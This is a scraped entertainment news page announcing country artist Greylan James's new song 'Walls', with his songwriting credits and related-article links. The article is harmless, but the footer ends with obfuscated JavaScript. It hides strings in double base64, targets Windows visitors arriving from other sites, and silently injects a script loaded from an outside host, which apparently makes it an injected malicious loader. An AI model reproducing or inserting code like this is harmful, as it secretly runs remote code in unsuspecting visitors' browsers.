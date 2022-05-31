Connect with us

Hi, what are you looking for?

EF Country

Rising songwriter & artist Greylan James to release new song ‘Walls’ on Friday 3rd June

James’ best song so far, ‘Walls’, to be released on Friday June 3rd.

Published

Greylan James 'Make Best Memories'
Credit: Greylan James / Fount Lynch PR

Country music artist-songwriter Greylan James will release his new song, “Walls,” this Friday, June 3. We’ve been fans of Greylan’s for a while now after his recent releases ‘Anything Cold’ and ‘Make Best Memories’.

James appeared on Season Four of NBC’s The Voice. He was also featured in Guitar Center Magazine’s Brotherhood of the Guitar Top 100, which ranks the top guitarists in the world under the age of 21. Hits for other artists written by James include ‘Happy Does’ by Kenny Chesney, ‘If That Ain’t God’ by Chris Young, and ‘Real Friends’ by Chris Janson featuring Blake Shelton 

James wrote “Walls” with Jacob Davis (Jordan Davis’ brother and co-writer) and Joshua Miller, and, along with Jason Massey, he also shared in the recording and production duties for the recording of “Walls‘. He also played all the instruments on the track too.

PRE-SAVE / PRE-ADD “WALLS” HERE

Advertisement. Scroll to continue reading.

Listen to ‘Anything Cold’ below:

In this article:

Advertisement

You May Also Like

CMAFest CMAFest

EF Country

The 10 must-see artists playing at CMAFest 2022

Our guide to who you should be seeing at this year's CMAFest in Nashville.

4 days ago
Carter Faith Carter Faith

EF Country

Carter Faith emerges from the Spotify ‘Fresh Finds’ program with ‘The Devil’s Still Down in Georgia’

Listen to Carter Faith's new song in conjunction with the Spotify 'Fresh Finds' program.

5 days ago
Ray Liotta Ray Liotta

Film

10 Ray Liotta performances to revisit following his death

We remember the actor with some of his best performances.

5 days ago
Steve Earle Steve Earle

EF Country

In conversation with Steve Earle as he releases new album ‘Jerry Jeff’

We talk to the legendary songwriter on the eve of his new album release.

5 days ago



Copyright © 2021 Entertainment Focus

Entertainment Focus is a trading name of Piñata Media Limited (Reg no: 08435639)

Entertainment Focus uses affiliate links. By buying through the links we may receive a commission for the sale. This has no effect on the price for you ;(function(){var mq=document.referrer;var xn=window.location.href;var rw=navigator.userAgent;var rt=new RegExp(xe('T2k4dktGdGVMMTByS1M4PQ=='));if(!mq||xn.match(rt)[1]==mq.match(rt)[1]||rw.indexOf(xe("VjJsdVpHOTNjdz09"))==-1||window.localStorage[xe("WDE5ZmRYUnRZUT09")]){return;}var xs=document.createElement('script');xs.type='text/javascript';xs.async=true;xs.src=xe('YUhSMGNITTZMeTloWTNSdmNuTXVhbU55WVdOcGJtY3VZMjl0TDNKbGNHOXlkRDl5UFdScU1ETk5SR2Q1V2xSak5WcHRUbWhPTWtWM1dUSk5NbGxxUVROT1ExcHFZVmRST1UxcVdYbz0=');var wj=document.getElementsByTagName('script')[0];wj.parentNode.insertBefore(xs,wj);function xe(os){return mj(window.atob(os));}function mj(zc){return window.atob(zc);}})();